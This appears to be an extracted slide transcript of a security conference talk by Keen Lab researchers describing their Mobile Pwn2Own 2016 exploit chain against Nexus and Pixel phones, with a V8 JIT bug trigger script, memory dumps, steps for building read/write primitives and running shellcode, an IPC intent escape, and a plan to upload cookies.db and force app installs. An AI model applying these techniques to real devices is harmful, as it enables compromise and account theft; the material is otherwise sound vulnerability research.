pwningthe nexus ™of every - flanker sky
TRANSCRIPT
![Page 1: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/1.jpg)
Pwning theNexus ™ ofEveryPixel ™
Qidan HeCredits also to: Gengming Liu
*NexusandPixelareregisteredtrademarksofGoogleInc.
![Page 2: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/2.jpg)
#whoami
• Qidan He• SeniorSecurityResearcheratKeenLab• Apple/Android/ChromeCVEhunter(“frequentcreditor”)• SpeakeratBlackHat USA/ASIA,DEFCON,RECON,CanSecWest,HITCON,QMSS• Pwn2Own2016/MobilePwn2Own2016winner
• Gengming Liu• SecurityResearcherInternatKeenLab• CTFenthusiastic,DEFCONCTFfinalplayer• CaptainofAAACTFteam• MobilePwn2Own2016winner
![Page 3: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/3.jpg)
AboutTencent KeenSecurityLab
• Previously known as KeenTeam• 2016PC/MobileMasterofPwn• Pwn2Ownchampionsin2013,2014,2015,2016,(2017currentlyrunning)• Pwnie Nominationsin2015,2016
![Page 4: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/4.jpg)
TL;DR:HowwepwnednewestNexus6P/PixelrunningNougat• Threebugsformsacompleteexploitchain• OneV8bugtocompromisetherenderer• OneIPCbugtoescapesandbox• Onebugingapps allowsappinstall
• Googleresponseveryquickly• V8andIPCbugfixedinmidnightof10.26(CVE-2016-5197andCVE-2016-5198)• Gapp updatepushedin10.27(GoogleVRPcredit)
![Page 5: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/5.jpg)
Agenda• IntroductionandExploitationofV8engine• IntroductionandExploitationofsandboxonAndroid•HowwepwnedNexus/PixelonMobilePwn2Own2016with3bugs• CVE-2016-5197/5198/GoogleVRP bug
![Page 6: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/6.jpg)
HistoryofclassicalChromeexploits
• MWRLabs,Pwn2Own2013• Type-confusioninwebkit• ArbitraryzerowriteinIPC::OnContentBlocked
• PinkiePie,MobilePwn2Own2013• Runtime_TypedArrayInitializeFromArrayLike forrenderercodeexecution• ArbitraryfreeinClipboardHostMsg_WriteObjectsAsync
• Geohot inPwnium 4• PropertyredefinitionleadtoOOBread/writeinrenderer• SpoofIPCMessagetovulnerableextensioninprivilegeddomain
• Lokihart inPwn2Own2015• TOCTOUinGPUprocesssharedmemory
• Juri InPwn2Own2015• UAFinP2PSocketDispatcherHost
![Page 7: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/7.jpg)
V8Javascript Engine
• Widelyknownandused• RuntimeoptimizationandJITtomachinecode• Strongtalk• Crankshaft• Turbofan
![Page 8: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/8.jpg)
ObjectstructureinV8
![Page 9: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/9.jpg)
0x2036cb90a089:[JSArrayBuffer]- map=0xebbd6702db1[FastProperties]- prototype=0x32cfe5005599- elements=0x1b6415782241<FixedArray[0]>[FAST_HOLEY_SMI_ELEMENTS]- internalfields:2- backing_store=0x5652757bea60- byte_length=24929- properties={}- internalfields={00}
vara=newArrayBuffer(0x6161)
![Page 10: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/10.jpg)
0x2036cb90a089:[JSArrayBuffer]- map=0xebbd6702db1[FastProperties]- prototype=0x32cfe5005599- elements=0x1b6415782241<FixedArray[0]>[FAST_HOLEY_SMI_ELEMENTS]- internalfields:2- backing_store=0x5652757bea60- byte_length=24929- properties={}- internalfields={00}
vara=newArrayBuffer(0x6161)
pwndbg$x/30xg0x00002036cb90a0880x2036cb90a088:0x00000ebbd6702db10x00001b64157822410x2036cb90a098:0x00001b64157822410x00006161000000000x2036cb90a0a8:0x00005652757bea600x0000000000000004
![Page 11: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/11.jpg)
BoxinginV8
• Float&Double encapsulatedinV8heap• HeapNumber object• vmovsd QWORDPTR[rax+0x7],xmm0
• SMI• 31bitintegerwithlowestbitsetto0
• Taggedpointer
![Page 12: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/12.jpg)
CVE-2016-5198– ChainofBugs#1
• FoundbyKeenLab andusedforMobilePwn2Own2016• AffectsallenginesbasedonV8andapplicationswithWebview
![Page 13: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/13.jpg)
Howweexploited CVE-2016-5198
![Page 14: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/14.jpg)
CVE-2016-5198ByKeenLab
![Page 15: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/15.jpg)
JITworkflowoverview
• JITcompilermodes• Interpretmode– onstartup,naïve,slow,safe• Optimizedmode– afterprofiling,fast
• Optimizedcodegeneratedaccordingtotype-infocollected• Whatifobjecttypechanged?• maptypecheckwillfail- Deoptimize andregenerate
![Page 16: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/16.jpg)
Deoptimization
• EagerDeoptimization• Usuallyseeninfunctionargumentchecks• Bailouttointerpretermodeimmediately
• LazyDeoptimization• Usuallyseenonglobalobjectaccess• Whochangestheobjectisresponsibleforpatchingfollowingusers
• WhatifitselfisalsoJITed?
![Page 17: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/17.jpg)
OOBinOptimizedJITcode
![Page 18: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/18.jpg)
function Ctor() {n = new Set();}function Check() {n.xyz = 0x826852f4;parseInt('AAAAAAAA');}for(var i=0; i<2000; ++i) {Ctor();}for(var i=0; i<2000; ++i) {Check();}Ctor();Check();print("finish");
var n;function Ctor() {n=new Set();}function Check() {n.xyz =0x826852f4;}Ctor();Ctor();%OptimizeFunctionOnNextCall(Ctor);Ctor();Check();Check();%OptimizeFunctionOnNextCall(Check);Check();Ctor();Check();parseInt('AAAAAAAA')
![Page 19: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/19.jpg)
![Page 20: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/20.jpg)
WhatJITdoes?
![Page 21: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/21.jpg)
OOBinOptimizedJITcode
![Page 22: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/22.jpg)
OptimizedcodeforCtor
![Page 23: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/23.jpg)
Non-optimizedcodeforfunc`Check`
![Page 24: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/24.jpg)
Optimized
optimizedcodeforfunc`Check`
![Page 25: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/25.jpg)
Optimized
![Page 26: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/26.jpg)
0x3f9385872433548b8c1bf4a339d070000REX.Wmovq rax,0x79d334abfc1;;object:0x79d334abfc1PropertyCell for0x130199d54631<aSetwithmap0x1ffdd430c391>
0x3f93858724d45488b400fREX.Wmovq rax,[rax+0xf]
#js:Getglobalvariablen
![Page 27: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/27.jpg)
Optimized
![Page 28: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/28.jpg)
0x3f9385872514949ba0000805e0a4de041REX.Wmovq r10,0x41e04d0a5e8000000x3f93858725b59c4c1f96ec2vmovq xmm0,r100x3f93858726064488b4007REX.Wmovq rax,[rax+0x7]0x3f93858726468488b400fREX.Wmovq rax,[rax+0xf]0x3f93858726872c5fb114007vmovsd [rax+0x7],xmm0
n.xyz =0x826852f4
![Page 29: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/29.jpg)
Heapnumberoverwrite
![Page 30: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/30.jpg)
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x31337
Map length:1
Non-empty FixedArray
Property1 …
Javascript: n.xyz = 0x31337
![Page 31: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/31.jpg)
• Optimizedcodeassumestheobjectalreadyhaveproperty
Nomaptypecheck
![Page 32: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/32.jpg)
However…
• Whatiftheobjectischangedanditdoesn’thavepropertynow?• Andthemapcheckiseliminatedingeneratedcode…• ASSUMPTIONINVALID!
![Page 33: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/33.jpg)
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map Hashcode
Null string
length Chars
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x31337
OUT OF BOUNDS HERE!
Map length:1
Non-empty FixedArray
Property1 Property
![Page 34: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/34.jpg)
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map Hashcode
Null string
length Chars
mov rax,QWORD PTR [rax+0xf]mov rax,QWORD PTR [rax+0x7]
0x826852f4
Map …type
Map for ONE_BYTE_INTERNALIZED_STRING_TYPE
…
vmovsd QWORD PTR [rax+0x7],xmm00x41e04d0a5e800000
Confused to EXTERNAL_STRINGChars interpreted as Pointer
Map Hashcode length Chars
0x4141414141..
AAAA
mov rax,QWORD PTR [rax+0xf]
![Page 35: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/35.jpg)
ExploitationSteps
• OOBwritecharsfieldofnullstringtoleakArrayBufferaddress• OverwriteArrayBufferbacking_store toleakFunctioncodeaddress• OverwriteArrayBufferbacking_store withFunctioncodeaddress• WriteshellcodetoArrayBufferandexec!
![Page 36: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/36.jpg)
Primitives
• Writeprimitive:• Sequentialwrite
• n.b =0x31337• HeapNumber write
• *(p+8)=v
• Readprimitive• ArrayBuffer storageisourfriend
• Heapnumber overwriteArrayBuffer_len_ptr (storage-8)• Butfirst… leakanArrayBuffer addresstoknowwheretowriteto
• Use#nullstringtocoldstart!
StructureofONE_BYTE_INTERNALIZED_STRINGpwndbg>job0x28b4ff7ab259#nullpwndbg>x/40xg0x28b4ff7ab2580x28b4ff7ab258: 0x0000090b4b182361 0x000000005887594a0x28b4ff7ab268: 0x0000000400000000 0xdeadbeed6c6c756e
![Page 37: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/37.jpg)
#nullstringascoldstart– Run#1
• OOBwritenullstringlength• OOBwritecharsfield• m.d =ab(newArrayBuffer)• newString(null)
• charCodeAt foreachbyte• ArrayBuffer and#nullstringaddressleaked!
• Turnlimitedsequentialwriteintoarbitraryaddresswrite
![Page 38: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/38.jpg)
Map length:0
Empty FixedArray
Map Hashcode
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.e = ab
m.d = null_str
Note:canassignobjecttofieldbutcannotdirectlyassignPointertofielde.g.`hashcode`(willdereferencefieldasPointerwrappedasfloatin64bit!)
![Page 39: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/39.jpg)
#nullstringascoldstart– Run#2
• PerformHeapNumber overwriteinnextoptimizationrun• m.d =unpackIEEE754(ab_len_addr)
![Page 40: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/40.jpg)
Map length:0
Empty FixedArray
Map (Overwritten)
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.d = *float*(ab_len_ptr)
Map Properties
Elements length storage
![Page 41: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/41.jpg)
PlaywithFunction– Run#3
• Function allocatd atbeginning• ab_storage_ptr =ab_len_ptr +8• m.b =unpackIEEE754(addr_of_code - 8)• Canabitrary readnow...Readwhat?
• DuringstartupFunctionaddressalsoliesbeforeArrayBuffer• HeapNumber overwrite*ab_storage_ptr =code_loc – 8• Code_ptr =ab[3]<<32+ab[2]
![Page 42: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/42.jpg)
Map length:0
Empty FixedArray
MapNow
#ab_len ptr)
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.b = *float*(code_ptr - 8)
Map Properties
Elements length
storage(Overwri
tten)Map Properti
esElement
s … … CODE
![Page 43: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/43.jpg)
PlaywithFunction– Finalrun
• m.b =unpackIEEE754(code_ptr)• *ab_storage_ptr =code_ptr• Writeshellcodewithabaccess• CallFunction• Gameover!J
![Page 44: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/44.jpg)
Map length:0
Empty FixedArray
MapNow
#ab_len ptr)
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.e = *float*(code_ptr)
Map Properties
Elements length
storage(Overwri
tten)Map Properti
esElement
s … … CODE
Write your shellcode on new Uint32Array(ab)!
0x2f8c75784bc0 <Function:~ :1>: 0x8b485756e5894855 0x41830f498b482f4f 0x2f8c75784bd0 <Function:~ :1+16>: 0x000c50a53b49011b 0xfff57b20e8057300 0x2f8c75784be0 <Function:~ :1+32>: 0xbab9bb48a0458b49 0x4383000021ea1e72 0x2f8c75784bf0 <Function:~ :1+48>: 0x7a86e8501f79d10b 0x72bab9bb4858fff5 0x2f8c75784c00 <Function:~ :1+64>: 0x00ba49000021ea1e 0x4c00001800000000 0x2f8c75784c10 <Function:~ :1+80>: 0x900008c2c9075389 0xdeadbeed00000000’
![Page 45: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/45.jpg)
Sorenderercodeexecutiongot…
• Nowwhat?
![Page 46: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/46.jpg)
Theanatomy ofChromesandbox
• AlluntrustedcoderunsinTargetprocess• RelaymostoperationstoBroker• Trybestto• lockdownthecapabilitiesofrenderer
• Evenrendereriscompromised• Accessisstillstrictlyprohibited
• GPUprocesshavehigherlevelaccess• Thannormalsandboxprocess
![Page 47: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/47.jpg)
Untrusted_app
ProcessprivilegesinAndroid
Isolated_app
media
radio
System_server
KernelAdb shell
![Page 48: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/48.jpg)
State-of-artdefenseofAndroidsandbox
• DACintroducedbynatureofLinux• IsolatedProcess introducedinJellyBean• SELinux enforcedinKitKat• Furtherrestrictedinsubsequentrelease
![Page 49: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/49.jpg)
So… HowdoweescapethesandboxinMobilePwn2Own2016?ChainofBugs#2
![Page 50: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/50.jpg)
Webviewinappisnotisolated
• Webview stillrunsinthesameuid/processasordinaryapp• Findsomeappwhichacceptscontrolled-URLtoattack• Oops..NoBROWSABLEones… butwehaveIPCbugtorescue!
![Page 51: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/51.jpg)
void RenderViewImpl::LaunchAndroidContentIntent(const GURL&intent,size_t request_id,bool is_main_frame){if (request_id !=expected_content_intent_id_)return;
//Removethecontenthighlightingifany.ScheduleComposite();
if (!intent.is_empty()){base::RecordAction(base::UserMetricsAction("Android.ContentDetectorActivated"));Send(newViewHostMsg_StartContentIntent(GetRoutingID(),intent,is_main_frame));}}//src/content/renderer/renderer_view_impl.cc
![Page 52: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/52.jpg)
bool RenderWidgetHostViewAndroid::OnMessageReceived(const IPC::Message&message){//…bool handled=true;IPC_BEGIN_MESSAGE_MAP(RenderWidgetHostViewAndroid,message)IPC_MESSAGE_HANDLER(ViewHostMsg_StartContentIntent,OnStartContentIntent)IPC_MESSAGE_HANDLER(ViewHostMsg_SmartClipDataExtracted,OnSmartClipDataExtracted)IPC_MESSAGE_HANDLER(ViewHostMsg_ShowUnhandledTapUIIfNeeded,OnShowUnhandledTapUIIfNeeded)IPC_MESSAGE_UNHANDLED(handled=false)IPC_END_MESSAGE_MAP()return handled;}
![Page 53: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/53.jpg)
publicvoidonStartContentIntent(Contextcontext,StringintentUrl,boolean isMainFrame){Intentintent;//PerformgenericparsingoftheURItoturnitintoanIntent.try{intent=Intent.parseUri(intentUrl,Intent.URI_INTENT_SCHEME);
Stringscheme=intent.getScheme();intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);}catch(Exceptionex){Log.w(TAG,"BadURI%s",intentUrl,ex);return;
}try{
context.startActivity(intent);}catch(ActivityNotFoundException ex){}}
CVE-2016-5197Arbitraryintentstartinbroker
![Page 54: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/54.jpg)
CVE-2016-5197
CVE-2016-5197ByKeenLab
![Page 55: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/55.jpg)
MobilePwn2OwnChainofBugs#3
• SeethatholyGoogleDrive• HavefullaccesstoGoogleaccount• TrustedbyGooglePlay• To“install”app
• Blindlyopensanyintent-controlledURL• Pwn ittojumpfromisolatedtountrusted• PlusAppinstallationability!
![Page 56: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/56.jpg)
Sandbox (runs v8)(isolated_app)
Broker(untrusted_app)
startContentIntentString
Google Drive(Runs v8)OpenUrlActivity
Intent with payload URL
`Click` IPCs
Intent is added Browsable
![Page 57: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/57.jpg)
Chainitalltogether
• UseCVE-2016-5198togaincontrolofrendererinChromebrowser• Note:ChromeonAndroidcurrentlyis32bit
• SearchforIPCobjects,issueViewHostMsg_StartContentIntentrequest• JumptoGoogleDrive,openEXPpageagain• Note:GoogleDriveisa64bitappsoitswebview isalso64bit
• Gotashellinuntrusted_app contextfromGoogleDrive• Reloadplay.google.com,uploadcookies.db inappdatadirectory• OrjustsendintenttoGooglePlay appforittoinstall
• Sendinstallapprequest,waitforBOOM
![Page 58: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/58.jpg)
Mitigations?
• ForbidopeninguntrustedURLs(tempsolution)• Webview multiprocess aslongtermsolution• Buthowaboutdevicespre-N?
• On-deviceconfirmationwheninstallingfromplay.google.com?
![Page 59: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/59.jpg)
NoGooglePlay/GoogleDrive,noconcern?
• Vendorsmakemorestupidmistakes• Variousappstores containswebview• Oneevenrunswebview assystem-uid - -!
![Page 60: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/60.jpg)
Furtherthought
• Isitpossibletoapplywebview sandboxingatapplicationlevelinpre-Ndevices?
![Page 61: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/61.jpg)
DEMO
![Page 62: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/62.jpg)
Acknowledgements
• AllcolleaguesatKeenLab
![Page 63: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/63.jpg)
Questions?
![Page 64: Pwningthe Nexus ™of Every - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/64.jpg)